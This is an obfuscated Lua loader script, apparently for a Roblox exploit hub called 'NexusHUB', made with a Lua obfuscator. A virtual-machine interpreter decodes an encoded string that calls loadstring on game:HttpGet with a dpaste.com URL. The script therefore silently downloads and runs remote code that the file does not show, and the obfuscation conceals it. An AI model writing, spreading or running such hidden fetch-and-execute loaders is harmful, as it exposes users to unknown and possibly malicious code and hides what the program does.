--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_NexusHUB(EASTER!)

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then local v80=0;while true do if (v80==0) then v19=v0(v3(v30,1,1));return "";end end else local v81=v2(v0(v30,16));if v19 then local v90=v5(v81,v19);v19=nil;return v90;else return v81;end end end);local function v20(v31,v32,v33) if v33 then local v82=(v31/(2^(v32-((879 -(282 + 595)) -1))))%(((1642 -(1523 + 114)) -3)^(((v33-((1 + 0) -0)) -(v32-(2 -1))) + (620 -(555 + 64)))) ;return v82-(v82%(932 -(857 + 74))) ;else local v83=(570 -(367 + 201))^(v32-(928 -(214 + (1015 -302)))) ;return (((v31%(v83 + v83))>=v83) and (1 + (1065 -(68 + 997)))) or (0 + 0) ;end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35=1270 -(226 + 1044) ;local v36;local v37;while true do if (v35==(4 -(960 -(892 + 65)))) then return (v37 * (373 -(32 + 85))) + v36 ;end if (v35==0) then v36,v37=v1(v16,v18,v18 + 2 + (0 -0) );v18=v18 + 1 + 1 ;v35=1;end end end local function v23() local v38=0 -0 ;local v39;local v40;local v41;local v42;while true do if (v38==(1 + 0)) then return (v42 * (31011612 -14234396)) + (v41 * (120312 -54776)) + (v40 * (1208 -(802 + 150))) + v39 ;end if (v38==(350 -(87 + 263))) then v39,v40,v41,v42=v1(v16,v18,v18 + (183 -(67 + 113)) );v18=v18 + (8 -5) + 1 ;v38=1 + 0 + 0 ;end end end local function v24() local v43=v23();local v44=v23();local v45=(886 -(261 + 624)) -0 ;local v46=(v20(v44,1,458 -((257 -112) + 293) ) * ((1189 -(1069 + 118))^(72 -40))) + v43 ;local v47=v20(v44,45 -24 ,(1086 -(1020 + 60)) + 25 );local v48=((v20(v44,804 -(201 + 571) )==(1 -0)) and  -(1 + 0)) or (792 -((1791 -(630 + 793)) + 423)) ;if (v47==(0 -0)) then if (v46==(18 -(10 + 8))) then return v48 * (0 -0) ;else v47=3 -2 ;v45=442 -(416 + 26) ;end elseif (v47==2047) then return ((v46==0) and (v48 * (1/(0 -0)))) or (v48 * NaN) ;end return v8(v48,v47-(3466 -2443) ) * (v45 + (v46/((1 + 1)^(91 -39)))) ;end local function v25(v49) local v50=0 -0 ;local v51;local v52;while true do if (v50==(4 -3)) then v51=v3(v16,v18,(v18 + v49) -(3 -2) );v18=v18 + v49 ;v50=(1818 -(1703 + 114)) + (702 -(376 + 325)) ;end if (v50==(6 -4)) then v52={};for v91=1748 -(760 + 987) , #v51 do v52[v91]=v2(v1(v3(v51,v91,v91)));end v50=1916 -(1789 + 124) ;end if (v50==(0 + 0)) then v51=nil;if  not v49 then v49=v23();if (v49==(766 -(745 + 21))) then return "";end end v50=1414 -(447 + 966) ;end if (v50==(2 + 1)) then return v6(v52);end end end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v53=(function() return 0;end)();local v54=(function() return;end)();local v55=(function() return;end)();local v56=(function() return;end)();local v57=(function() return;end)();local v58=(function() return;end)();local v59=(function() return;end)();while true do if (v53== #"[") then local v86=(function() return 1288 -(993 + 295) ;end)();local v87=(function() return;end)();while true do if ((0 + 0)==v86) then v87=(function() return 0 + 0 ;end)();while true do if (v87==(0 + 0)) then v58=(function() return v23();end)();v59=(function() return {};end)();v87=(function() return 1 -0 ;end)();end if (v87==(1172 -(418 + 753))) then for v112= #"[",v58 do local v113=(function() return 0 -0 ;end)();local v114=(function() return;end)();local v115=(function() return;end)();local v116=(function() return;end)();while true do if (v113==1) then v116=(function() return nil;end)();while true do if (v114==1) then if (v115== #"{") then v116=(function() return v21()~=0 ;end)();elseif (v115==(1 + 1)) then v116=(function() return v24();end)();elseif (v115~= #"nil") then else v116=(function() return v25();end)();end v59[v112]=(function() return v116;end)();break;end if (v114==(1636 -(1373 + 263))) then v115=(function() return v21();end)();v116=(function() return nil;end)();v114=(function() return 1001 -(451 + 549) ;end)();end end break;end if (v113==(0 + 0)) then v114=(function() return 0 + 0 ;end)();v115=(function() return nil;end)();v113=(function() return 1 + 0 ;end)();end end end v57[ #"-19"]=(function() return v21();end)();v87=(function() return 2;end)();end if (v87~=(531 -(406 + 123))) then else v53=(function() return 2;end)();break;end end break;end end end if (v53==(2 -0)) then for v93= #">",v23() do local v94=(function() return v21();end)();if (v20(v94, #"\\", #"\\")==(0 -0)) then local v103=(function() return 1384 -(746 + 638) ;end)();local v104=(function() return;end)();local v105=(function() return;end)();local v106=(function() return;end)();local v107=(function() return;end)();while true do if (v103~=(1324 -(1249 + 73))) then else while true do if (v104== #" ") then local v117=(function() return 0 + 0 ;end)();local v118=(function() return;end)();while true do if (v117~=0) then else v118=(function() return 0 + 0 ;end)();while true do if (v118==(1 -0)) then v104=(function() return 343 -(218 + 123) ;end)();break;end if ((1581 -(1535 + 46))~=v118) then else v107=(function() return {v22(),v22(),nil,nil};end)();if (v105==(0 + 0)) then local v171=(function() return 0 + 0 ;end)();local v172=(function() return;end)();while true do if (v171==(0 + 0)) then v172=(function() return 0 -0 ;end)();while true do if (v172==(0 -0)) then v107[ #"xxx"]=(function() return v22();end)();v107[ #"xnxx"]=(function() return v22();end)();break;end end break;end end elseif (v105== #".") then v107[ #"nil"]=(function() return v23();end)();elseif (v105==2) then v107[ #"xnx"]=(function() return v23() -((1 + 1)^(576 -(306 + 254))) ;end)();elseif (v105== #"nil") then local v179=(function() return 114 -(4 + 110) ;end)();while true do if (0==v179) then v107[ #"gha"]=(function() return v23() -((586 -(57 + 527))^16) ;end)();v107[ #".com"]=(function() return v22();end)();break;end end end v118=(function() return 1428 -(41 + 1386) ;end)();end end break;end end end if (v104==(1 + 1)) then local v119=(function() return 103 -(17 + 86) ;end)();local v120=(function() return;end)();while true do if ((0 -0)==v119) then v120=(function() return 0;end)();while true do if (v120==(1467 -(899 + 568))) then if (v20(v106, #"/", #"\\")~= #".") then else v107[2 + 0 ]=(function() return v59[v107[4 -2 ]];end)();end if (v20(v106,605 -(268 + 335) ,2)== #"]") then v107[ #"-19"]=(function() return v59[v107[ #"gha"]];end)();end v120=(function() return 1;end)();end if (v120~=(2 -1)) then else v104=(function() return  #"91(";end)();break;end end break;end end end if ( #"xnx"~=v104) then else if (v20(v106, #"gha", #"gha")== #">") then v107[ #"0313"]=(function() return v59[v107[ #"?id="]];end)();end v54[v93]=(function() return v107;end)();break;end if (v104==(166 -(122 + 44))) then local v122=(function() return 290 -(60 + 230) ;end)();local v123=(function() return;end)();while true do if (v122~=(0 -0)) then else v123=(function() return 572 -(426 + 146) ;end)();while true do if (v123==(0 + 0)) then v105=(function() return v20(v94,2, #"gha");end)();v106=(function() return v20(v94, #".com",1 + 5 );end)();v123=(function() return 1 -0 ;end)();end if (v123~=1) then else v104=(function() return  #":";end)();break;end end break;end end end end break;end if (v103==1) then local v109=(function() return 65 -(30 + 35) ;end)();local v110=(function() return;end)();while true do if ((1456 -(282 + 1174))~=v109) then else v110=(function() return 811 -(569 + 242) ;end)();while true do if ((2 -1)~=v110) then else v103=(function() return 1 + 1 ;end)();break;end if ((1024 -(706 + 318))==v110) then v106=(function() return nil;end)();v107=(function() return nil;end)();v110=(function() return 3 -2 ;end)();end end break;end end end if (v103==0) then local v111=(function() return 1212 -(323 + 889) ;end)();while true do if (v111==0) then v104=(function() return 1251 -(721 + 530) ;end)();v105=(function() return nil;end)();v111=(function() return 1272 -(945 + 326) ;end)();end if (v111~=(2 -1)) then else v103=(function() return 1 + 0 ;end)();break;end end end end end end for v95= #"\\",v23() do v55[v95-#"/" ]=(function() return v28();end)();end return v57;end if (v53~=(413 -(15 + 398))) then else local v88=(function() return 0 + 0 ;end)();local v89=(function() return;end)();while true do if (v88==0) then v89=(function() return 700 -(271 + 429) ;end)();while true do if (v89~=(7 -5)) then else v53=(function() return  #"[";end)();break;end if (v89==(0 + 0)) then v54=(function() return {};end)();v55=(function() return {};end)();v89=(function() return 1 + 0 ;end)();end if (v89==(1 + 0)) then v56=(function() return {};end)();v57=(function() return {v54,v55,nil,v56};end)();v89=(function() return 1088 -(461 + 625) ;end)();end end break;end end end end end local function v29(v60,v61,v62) local v63=v60[1 + 0 ];local v64=v60[128 -(116 + 10) ];local v65=v60[1 + 2 ];return function(...) local v66=v63;local v67=v64;local v68=v65;local v69=v27;local v70=739 -(542 + 196) ;local v71= -(1 -0);local v72={};local v73={...};local v74=v12("#",...) -(1 + 0) ;local v75={};local v76={};for v84=0,v74 do if ((1881>1293) and (v84>=v68)) then v72[v84-v68 ]=v73[v84 + 1 + (0 -0) ];else v76[v84]=v73[v84 + (2 -1) ];end end local v77=(v74-v68) + (2 -1) ;local v78;local v79;while true do local v85=1551 -((1430 -(244 + 60)) + 327 + 98) ;while true do if (v85==(405 -(118 + 287))) then v78=v66[v70];v79=v78[(479 -(41 + 435)) -(1003 -(938 + 63)) ];v85=1122 -(118 + 1003) ;end if (v85==(2 -1)) then if ((2357==2357) and (v79<=(385 -(142 + 235)))) then if (v79<=(13 -10)) then if (v79<=(1 + 0)) then if (v79==(977 -(426 + 127 + 424))) then v76[v78[3 -1 ]]=v62[v78[(1128 -(936 + 189)) + 0 ]];else do return;end end elseif (v79==(2 + 0)) then v76[v78[2 + 0 + 0 ]]={};else local v127=0;local v128;local v129;while true do if ((123==123) and (v127==(1 + 0))) then v76[v128 + (1614 -(1565 + 48)) + 0 ]=v129;v76[v128]=v129[v78[8 -4 ]];break;end if (v127==(0 -0)) then v128=v78[(3 + 1) -(1140 -(782 + 356)) ];v129=v76[v78[1 + 2 ]];v127=4 -3 ;end end end elseif ((v79<=(758 -(239 + 514))) or (1056>=3392)) then if (v79>(2 + 2)) then v76[v78[1331 -(797 + 532) ]]=v78[3];else v76[v78[2 + 0 ]]={};end elseif (v79<=6) then local v133=v78[1 + 1 ];local v134=v76[v78[3]];v76[v133 + 1 ]=v134;v76[v133]=v134[v78[4]];elseif (v79==7) then do return;end else local v153=v78[4 -2 ];v76[v153]=v76[v153](v13(v76,v153 + 1 ,v71));end elseif ((v79<=(1214 -((640 -(176 + 91)) + (2159 -1330)))) or (1081<1075)) then if (v79<=(741 -(476 + 255))) then if (v79==(1139 -(369 + 761))) then v76[v78[2]]=v78[2 + 1 ];else v76[v78[2]]();end elseif ((v79>11) or (2408<2109)) then v76[v78[2 -0 ]]=v62[v78[5 -2 ]];else local v142=0;local v143;while true do if ((v142==(0 -0)) or (33==1455)) then v143=v78[240 -((1156 -(975 + 117)) + 174) ];v76[v143]=v76[v143](v13(v76,v143 + 1 + 0 ,v71));break;end end end elseif (v79<=14) then if ((v79==((1893 -(157 + 1718)) -5)) or (443>=4015)) then local v144=v78[338 -(144 + 192) ];local v145,v146=v69(v76[v144](v13(v76,v144 + (217 -(42 + 142 + 32)) ,v78[3 + 0 ])));v71=(v146 + v144) -(1 + 0) ;local v147=0 + 0 ;for v150=v144,v71 do v147=v147 + (1505 -(363 + 1141)) ;v76[v150]=v145[v147];end else v76[v78[1582 -(1183 + 397) ]]();end elseif ((3382>166) and (v79<=(45 -30))) then v76[v78[2 + 0 ]]=v78[3]~=(0 + 0) ;elseif ((v79>(1991 -(1913 + 62))) or (280==3059) or (1049>=4432)) then local v155=v78[(6 -4) + 0 ];local v156,v157=v69(v76[v155](v13(v76,v155 + (2 -1) ,v78[3])));v71=(v157 + v155) -(1934 -(565 + (4676 -3308))) ;local v158=0 -0 ;for v168=v155,v71 do v158=v158 + (1662 -(1477 + 184)) ;v76[v168]=v156[v158];end else v76[v78[(1020 -(697 + 321)) -(0 -0) ]]=v78[3 + 0 ]~=(856 -(564 + 292)) ;end v70=v70 + (1 -0) ;break;end end end end;end return v29(v28(),{},v17)(...);end return v15("LOL!043Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q747047657403203Q00682Q7470733A2Q2F6470617374652E636F6D2F3852552Q54334142362E747874000A4Q00027Q00120C000100013Q00120C000200023Q002006000200020003001209000400044Q0010000500014Q000D000200054Q000800013Q00022Q000E0001000100012Q00073Q00017Q00",v9(),...);
